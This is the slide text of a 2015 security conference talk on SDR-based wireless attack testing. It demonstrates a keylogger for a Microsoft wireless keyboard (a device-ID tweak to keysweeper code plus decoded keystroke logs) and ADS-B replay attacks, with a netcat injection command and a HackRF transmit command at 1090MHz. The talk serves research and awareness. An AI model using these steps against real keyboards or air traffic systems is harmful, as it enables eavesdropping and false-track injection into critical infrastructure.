Keiichi HoriaiFujitsu System Integration LABs.
CODE BLUE 2015
Wireless security testing with attack
Agenda Circumstance
In the IoT (Internet of Things) era• key : Wireless Security• To analyze wireless security, SDR ( Software Defined Radio) technology is effective.
Introduce GNU Radio, a SDR tool Powerful tool to test wireless security Easily available, work with inexpensive peripheral hardware
Wireless security testing with attack Attack#1 Key logging wireless keyboard Attack#2 The replay attack for ADS-B
2
Recent release of wireless security
Abuse/Falsification of software and firmware Drone attack by malware and network
• http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/
RF signal level interception/injection SPREAD SPECTRUM SATCOM HACKING: ATTACKING THE
GLOBALSTAR SIMPLEX DATA SERVICE• https://www.blackhat.com/docs/us-15/materials/us-15-Moore-
Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar-Simplex-Data-Service.pdf
Low-cost GPS simulator – GPS spoofing by SDR• Lin Huang, Qing Yang, DEFCON23
• https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Lin%20Huang%20&%20Qing%20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf
3
In 2001, Eric Blossom in US started a free & open-source software development toolkit about radio.
Multi-platform (Linux/FreeBSD/OSX/Windows)
Run on personal computer. cf. Many software radio technology run on FPGA on exclusive hardware.
Create flow graph to use GUI on GNURadio Companion
flow graph -> XML file -> Python -> C++
License GPL ver3
http://gnuradio.org/redmine/projects/gnuradio/wiki
About GNURadio
4
GNURadio Component
Elements of the flow graph
SOURCE BLOCK SINK
Software
or
Hardware
Software
Python
C++
Software
or
Hardware
Input OutputProcessing
5
Sources Software
Waveform generation (Sin, Cos, Triangle, Sawtooth, Square )
Various noiseFile
HardwarePC AudioOther peripheral hardware
•RTL-SDR, HackRF, BladeRF, USRP
6
Blocks Operator(Logical, Bytes, Integer, Real, Complex...) Constant, Variable(slider), Type conversion Calculation (add, sub, multiple, div, Log, RMS, integral...) Filter(LowPass, HighPass, BandPass, Reject, FFT, Hilbert,
IIR, Decimation...) Modulation and demodulation ( AM, FM, FSK, PSK, QAM,
OFDM…) Level control (AGC, Mute, Squelch, Moving average...) Network (TCP, UDP, Socket...) and more
7
Sinks Software
Hardware PC Audio Other peripheral hardware
• HackRF, BladeRF, USRP, ... etc.
SCOPE FFT Water Fall
Histogram Constellation Plot
Other Files
8
Peripheral hardware (e.g.)
RTL-SDR HackRF BladeRF USRP
Frequency range [MHz] 24-1800 1-6000 300-
3800 70-6000A/D convertbits 8 8 12 12Band range [MHz] 2.8 20 28 56Transfer / Receive RX Tx | Rx Tx & Rx Tx & RxPrice $20 $300 $420 $675
9
FlowGraph (e.g.)
Available tools
10
VHF receiver A VHF receiver composed of RTL-SDR and GNU Radio
RTL-SDR
11
ISM 2.4GHz band
WiFi/Bluetooth frequency allocation
http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems
12
ISM 2.4GHz band monitoring (e.g.)
HackRF
13
Attack wireless devices
Survey attack targetSearch FCC ID in FCC sitePhotos, someone else put on view?Overhaul by myself
Necessary informationRF chip data sheet
•Frequency band, Modulation, Transmission speed, Data format
Observe and analyze the signal14
FCC ID Search
https://apps.fcc.gov/oetcf/eas/reports/ViewExhibitReport.cfm?mode=Exhibits&RequestTimeout=500&calledFromFrame=N&application_id=Al%2FFPgcInlgHLjNZvXbPTQ%3D%3D&fcc_id=A6O60001058RX
15
How to monitoring and analyzing the signal
Receive radio waves Check the signal : GNU Radio, SDR# Write the received signal to file : GNU Radio, rtl_sdr
Analyze Monitoring the waveform in detail : baudline Cut the area where you need ( The area selected and
write to file ) : baudline Demodulation: GNU Radio | in-house scripts Decode / Parse / Decrypt
• Convert to bits (0/1) ( Hex dump is unreadable )• Find the characterized bit pattern
16
Signal monitoring tool Baudline
Baudline is the signal time-frequency visualization and analysis support tool
Requirements• Linux(x86_64,PowerPC)• Mac OS X• Solaris SPARC
Select the area and write to file
http://www.baudline.com/index.html17
Monitoring the signal (e.g.)
18
Attack demo #1
Keylogger for Microsoft wireless keyboard 800At first, try to reproduce “keysweeper”(*1)It can’t work the MS Wireless Keyboard 800
Japanese editionDemonstrate process from investigate the
cause using the GNU Radio to work
(*1) https://github.com/samyk/keysweeper19
Keylogger for Wireless Keyboard
27MH z band It is easy to snoop because (in)secureEnd of sale in the 2000s
2.4GHz bandSame as Bluetooth/WiFi frequencyBluetooth specification is secure?What about the proprietary specification
keyboard?
20
Relation Project Travis Goodspeed, 2010
The GoodFET is an open-source JTAG adapter, loosely based
upon the TI MSP430 FET UIF and EZ430U boards http://goodfet.sourceforge.net/
KeyKeriKi Project (CanSecWest 2010) Developed some device with ARM Cortex MPU and radio module
which can keyboard sniffing and remote command execution.
http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html
Keysweeper (January 2015) Make efficient and systematize processes
• Focus on a part of device address fixed 0xCD• Embedded in USB charger and logging to EEPROM• Detect keyword and mobile module send SMS• Forward keystroke to another device in real time ... etc.
https://github.com/samyk/keysweeper
21
Experiment on breadboard
Sniffer hardware
USB
control PC
Microsoft Wireless Keyboard 800 Arduino nano
•Scan 2403-2480MHz by 1MHz step•Inspect 1 byte (=0xCD) in device ID•If next 2byte are (0x0A38 | 0x0A78), stop scanning and start logging
about 1500 lines Arduino program
nRF24L01・ 2.4GHz ISM band ・ GFSK modulation・ 1Mbps or 2Mbps
22
Success ?Radio setupEnd radio setupscanTuning to 2480Potential keyboard: AA AA 5A A9 CD 27 55 49 Tuning to 2403Tuning to 2404Potential keyboard: E4 AA AA A5 CD 55 A5 5A Tuning to 2405Tuning to 2406Tuning to 2407Tuning to 2408…………………
No !!23
Wireless keyboard wave form
24
Baudline (cut the area)
25
Demodulation
-50-40-30-20-10
01020304050
1 51 101 151 201 251 301
-50-40-30-20-10
01020304050
1 51 101 151 201 251 301
I/Q
Vfm Vfm = ( I ( dQ/dt) - Q ( dI/dt)) / (I ^2 + Q^2)
preamblebit = Vfm > 0 ? 0:1bit
26
Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111111111111110010101010101010010011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110010100110011100111001110011100011110111110100111000111111111111100110010000000000001111111011111111111111101111111101111111111111111111111111111111001010101010101001001100111110010100010110110011100100000000000101001111000000111010000000101001110000111011010011000110011101010011110111000001000111001010011001110101001110011100111000111101111101001110101111111111100110000001000100010001111111111111111111111111011111111111111111111101010101001011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110……….
27
nRF24L01 Packet format Preamble
0xAA | 0x55 Address
3-5 Byte PCF
9 bit Payload
0- 32Byte CRC
1-2 bytehttp://www.nordicsemi.com/eng/Products/2.4GHz-RF/nRF24L01
28
KeyKeriki Project results
・ Microsoft Wireless Keyboard 800’s device address is composed of 5 byte start from 0xCD
・ Keystroke is encrypted by simple XOR operation using this device address
http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf
29
Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111111111111110010101010101010010011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110010100110011100111001110011100011110111110100111000111111111111100110010000000000001111111011111111111111101111111101111111111111111111111111111111001010101010101001001100111110010100010110110011100100000000000101001111000000111010000000101001110000111011010011000110011101010011110111000001000111001010011001110101001110011100111000111101111101001110101111111111100110000001000100010001111111111111111111111111011111111111111111111101010101001011001111100101000101101100111001000000000001010011110000001110100000001010011100001110110100110001100111010100111101110000010001110……….
find to “0x0A78 (0000101001111000)”
Packet control field 9 bit
Devie ID
Preamble 8bit + address 5 byte + packet control 9bit + payload
30
Device ID detection
{ P.A. } { [p0] p[1] [p2] [p3] [p4]} AA A9 33 E5 16 CE10101010 10101001 00110011 11100101 00010110
11001110{PktCTL Bit} 0A 78 1D 01010000000 00001010 01111000 00011101 00000001{ payload .......0100111000011101101001100011001110101001111011100……
// From keysweeper_mcu_src https://github.com/samyk/keysweeperif (radio.available()) { radio.read(&p, PKT_SIZE); if (p[4] == 0xCD) // 0xCD -> 0xCE for Japanese KBD { sp("Potential keyboard: ");
DEVICE ID
31
Behavior after (0xCD->0xCE){………………}Tuning to 2479Tuning to 2480Potential keyboard: A9 33 E5 16 CE 43 5 3CKEYBOARD FOUND! Locking in on channel 802setupRadio 16: 0A 78 1D 01 56 03 43 00 00 1E 00 00 00 00 00 8F <- Key 1 Press> 1 8: 0A 38 1D 01 56 03 00 84 16: 0A 78 1D 01 57 03 43 00 00 00 00 00 00 00 00 90 <- Key OFF 16: 0A 78 1D 01 58 03 43 00 00 1F 00 00 00 00 00 80 <- Key 2 Press> 2 8: 0A 38 1D 01 58 03 00 8A {………………}
(*1) USB HID usage table: http://www.freebsddiary.org/APC/usb_hid_usages.php
(*1)
32
Key Logger DEMO
33
Summary #1 Using GNU Radio, find the device address KEY
(0xCE) of the Microsoft Wireless Keyboard 800 Japanese edition
Change the device address KEY to 0xCE, then monitor keylogger Behavior.
Don’t use wireless keyboard, when the operation with sensitive information. Especially, warn against using proprietary specification device.
Caution Experiment in Japan, signal from nRF24L should be invalidated
• boolean shoutKeystrokes = true; -> false;
34
Attack demo #2 Replay attack for ADS-B(*1) mounted on
aircraftAviation is part of the critical infrastructureADS-B is next generation air traffic control
systemAttack demo played in Blackhat2012,
DEFCON20, ...etc.Applying SDR technology, tried to replay
the attack(*1)Automatic Dependent Surveillance–Broadcast
35
Congestion in the Skies
http://www.flightradar24.com/
36
ADS-B overview Because old radar’s positional accuracy was 1-2 NM, there was a need to
widen the service interval to ensure the safety of aircraft operation.
To keep up with aircraft increasing, new system is needed. ADS-B, using GPS, to provide a highly accurate position information, has been developed as next generation air traffic control system in 1980-1990.
Now, about 70 % of passenger plane have ADS-B
(Source http://www.flightradar24.com/how-it-works)
Required to equip until 2017 in Europe, until 2020 in the United States
Point at issue No encryption Broadcast with no authentication Simple encoding and simple modulation scheme
37
Mechanism of ADS-B ADS-B
Automatic Dependent Surveillance–BroadcastUsing broadcast datalink, Aircraft transmits own
location, speed, altitude, and so on obtained from measuring system such as GPS.
Image http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf
38
GPS location
Broadcast Datalink
Control Center Ground Receiving Station
Papers related to ADS-B About Vulnerability
Donald L. McCallie, Major, USAF (2011)• http://apps.fcc.gov/ecfs/document/view.action?id=7021694523
Andrei Costin, Aurelien Francillon, BlackHat2012• https://media.blackhat.com/bh-us-12/Briefings/Costin/
BH_US_12_Costin_Ghosts_In_Air_Slides.pdf Brad render, DEFCON20 ( 2012 )
• http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-RenderMan-Hackers-plus-Airplanes.pdf
Hugo Teso, CyCon2013 (2013)• https://ccdcoe.org/cycon-2013.html
About Countermeasures Martin Strohmeier, Ivan Martinovic 、 (2014)
• Detecting False-Data Injection Attacks on Air Traffic Control Protocols• http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf
Kyle D. Wesson,Brian L. Evans, and more. (2014)• Can Cryptography Secure Next Generation Air Traffic Surveillance? • https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf
Seoung-Hyeon Lee , Yong-Kyun Kim, Deok-Gyu Lee, and more. (2014)• Protection Method for Data Communication between ADS-BSensor and Next-Generation Air
Traffic Control Systems• http://www.mdpi.com/2078-2489/5/4/622
39
Expected threats
Snoop (Eavesdropping)
Jamming
Fake aircraft’s wake injection(Fake track injection)
40
How to receive ADS-B?
Receive the radio wavesUSB stick for receiving overseas digital TV
It’s about 1000 JPY to 2000 JPY
Process the signal and displayPC
•Windows, Mac, Linux
Smartphone, Tablet41
ADS-B receiver software Decoder
ADSB# http://airspy.com/index.php/downloads/
RTL1090 http://rtl1090.web99.de/
Modesdeco2 (w/ display function)
• http://radarspotting.com/forum/index.php/topic,2978.msg13471.html
dump1090 (w/ display function)
• https://github.com/antirez/dump1090
Display
Virtual Radar Server http://www.virtualradarserver.co.uk/
adsbSCOPE
• http://www.sprut.de/electronic/pic/projekte/adsb/adsb_en.html#downloads
PlanePlotter http://www.coaa.co.uk/planeplotter.htm
42
Receivable area
Antenna
43
ADS-B format
Format
Actual received I/Q signals
https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This%20-%20Slides.m4v
44
Waveform monitoring with GNU Radio
(I2 + Q2)I/Q
45
Received ADS-B (e.g.)
*8d7583a5585b575a9ebc4bbb3f04;
CRC: 000000 (ok)DF 17: ADS-B message. Capability : 5 (Level 2+3+4 ) ICAO Address : 7583a5 Extended Squitter Type: 11 Extended Squitter Sub : 0 Extended Squitter Name: Airborne Position ……. F flag : odd T flag : non-UTC Altitude : 17125 feet ………….
Raw data in hex
Aircraft location data, ...etc.
I/Q signal after A/D convert
Demodulation / Decode
Parse the data
46
Attack Vector
IP Network
ADS-B Receiving Station
ADS-B Receiving StationADS-B
Receiving Station
ADS-BBroadcast
GPS Satellite
Actor V2
V3
Image http://www.mlit.go.jp/koku/koku_fr14_000007.html
V1
47
Replay Attack (V1) Intercepted raw data ( File name: xxxx.raw)
Inject the raw data via IP network$cat xxxx.raw | nc target_IP target_PORT
※In reality, the adversary needs to find a way to get through the authentication in order to connect to the target server.
*8d869210581fe3bf4350dfd62439;*5da40455385715;*8d86dca29914ee0f20f410ef2595;*8d780c3c581db79c18a4b0ffc872;*8d867f609914b993e8700ba91251;*02a1839b9e229d;*……………
48
Replay Attack (V2) Create an ADS-B pulse signal file from the raw data
$cat xxxx.raw | ./adsb-pulsegen test_file.bin
Use the file to generate a RF signal modulated $hackrf_transfer –f 1090MHz –s 2MHz –t test_file.bin –x 0
*8d869210581fe3bf4350dfd62439;*5da40455385715;*8d86dca29914ee0f20f410ef2595;*8d780c3c581db79c18a4b0ffc872;*8d867f609914b993e8700ba91251;*02a1839b9e229d;*0261819c1d1e5a;……………
49
DEMO Injection via IP network (V1)
Real-time interception of ADS-B signal and display on map
Inject the raw data received in the past
Injection via RF channel (V2)Generate an I/Q signal file from the received raw
data Inject the RF signal modulated by the I/Q signal
50
ADS-B network injection
http://www.flightradar24.com/
Network injection demo Screen shot
51
ADS-B RF injectionRF injection demo screen shot
52
Security of air traffic control? Why doesn’t it get renewed?
Threat not being recognized
To preserve safety and interoperability
International discussion takes a long period of time
• Forming consensus
• Development
• Deployment
Image http://www.jatcaonline.com/SSR_system.JPG https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG
ASR/SSR
ILS ( glide slope / Localizer )
VOR/DME
53
Summary #2 Technically, an attack against ADS-B is extremely easy
Not only ADS-B but any air traffic control system that relies on radio waves are vulnerable to jamming attacks.
Possible attack scenarios
Terrorists or nation state actors injects false flight paths or performs jamming attacks to confuse the air traffic control as one of the ways to accomplish an objective.
Is it hard to implement early countermeasures? ( Requires an international consensus )
A mitigation plan such as detecting interception or using tracking algorithms must be considered
Create an environment that enhances virtual trainings and incident response plan
54
Conclusion Due to the emerge of the software defined radio experiment
tool GNU Radio and the low cost RF related hardware, the technical threshold to carry out an RF attack has been lowered
The existing systems that relies on radio waves such as the air traffic control system, has not been able to follow the modernization which the commercial technology like WIFI or smartphone has gone through
A fundamental countermeasure will require a long period of time
Compensating the lack of countermeasure with operational practice will require an enhanced incident response plan and trainings
55
Thank you !
Questions ?
56
57 Copyright 2010 FUJITSU LIMITED